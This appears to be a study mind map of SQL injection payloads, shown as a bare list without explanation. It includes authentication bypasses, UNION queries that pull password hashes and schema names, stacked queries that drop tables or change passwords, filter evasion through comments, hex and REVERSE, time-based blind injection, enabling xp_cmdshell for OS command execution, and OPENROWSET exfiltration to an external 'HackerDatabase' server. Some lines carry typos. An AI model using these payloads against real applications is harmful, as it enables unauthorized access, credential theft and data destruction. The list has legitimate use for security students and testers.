Coggle requires JavaScript to display documents.
' 1=@@servername
select * from syslogins where pwdcompare ('mypassword', password) = 1
alter server role sysadmin add member mylogin--
select name from sysdatabases
INSERT INTO OPENROWSET( 'SQLOLEDB', 'driver=sql server;server=Troy-PC; database= HackerDatabase;uid=HackerLogin;pwd=password', 'select name from city_hacked') select name from city
exec sp_configure 'ad hoc distributed queries', 1 reconfigure
exec xp_cmdshell 'ping mywebsite.com'
exec sp_configure 'xp_cmdshell', 1 reconfigure
exec xp_xmdshell 'ping my_website.com > c:\temp\file.txt' exec xp_xmdshell 'type c:\temp\file.txt'
select is_rolemember('db_datareader') select is_rolemember('db_datawriter') select is_rolemember('db_owner')
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED example AS public class exploit { public static void exec() throws Exception { Runtime.getRuntime().exec("ls"); } };
CREATE OR REPLACE FUNCTION exec RETURN VARCHAR2 AS LANGUAGE JAVA NAME 'exploit.exec () return void';
SELECT exec() FROM dual;
'v12'' or 1-1--'
'; EXEC(SEL' + 'ECT * FR' + 'OM USERPROFILE');
/**/
'or/**/1/**/=/**/1/**/'
or 1=/*
*/1--
SELECT * FROM user where username = '' or 1=/*and password='*/1--
DECLARE @x VARCHAR80; SET @x = 0X73834726361717AC23354 EXEC (@x)
SELECT @@VERSION;
REVERSE()
DECLARE @x VARCHAR80; SET @x = REVERSE( eliforpresu morf * tceles) EXEC (@x)
DECLARE @x VARCHAR80, @y VARCHAR80; SET @x = REVERSE( xxxSELxxxECTxxx...), SET @y = CONCAT(SUBSTRING(@x, 4 ,3), SUBSTRING(@x,10,3),...) EXEC (@y)
SELECT password_hash FROM USERS WHERE login = 'admin' and 1=2 UNION SELECT '6c7124bca62393...' --'
1*1, 1+0, 2-1
id=2-(SELECT 1 FROM DUAL)
Jo' + 'hn
Jo' || 'hn albo Jo' || (SELECT 'h' from DUAL) || 'n
name='John' AND 1=1 name='John') AND 1=1 name='John')) AND 1=1
user[city]=Warsaw&user[email]=a@localhost
' or 1=1--
johnsmith';drop table users-- johnsmith';create login ... johnsmith';update users set password ='foo'--
http://dummypage.com/cylinders=V12' and 1=(select * from foo)
http://dummypage.com/cylinders=V12' and 1=(select top 1 password from userprofile)
select top 1 name from (select top 7 name from sys.tables order by name) t order by name desc
SELECT cast(version() as integer)
https://example.com/search?query=test' UNION SELECT null, null, column_name, null, null FROM information_schema.columns WHERE table_name='blog_users'--
UNION SELECT NULL-- UNION SELECT NULL, NULL-- ...
ORDER BY 50--
(select top 1 password from userprofile)
select * from supercar order by case when (select count(*) from sys.tables) = 10 then powerkw else topspeed end desc
'); if (select top 1 ascii(lower(substring(name, 1,1))) from sys.tables) < 109 waitfor delay '00:00:05' --
https://example.com/getCategoryCount?categorytest' AND 1=2--
select * from sys.columns
select * from sys.tables
John' or 1=1--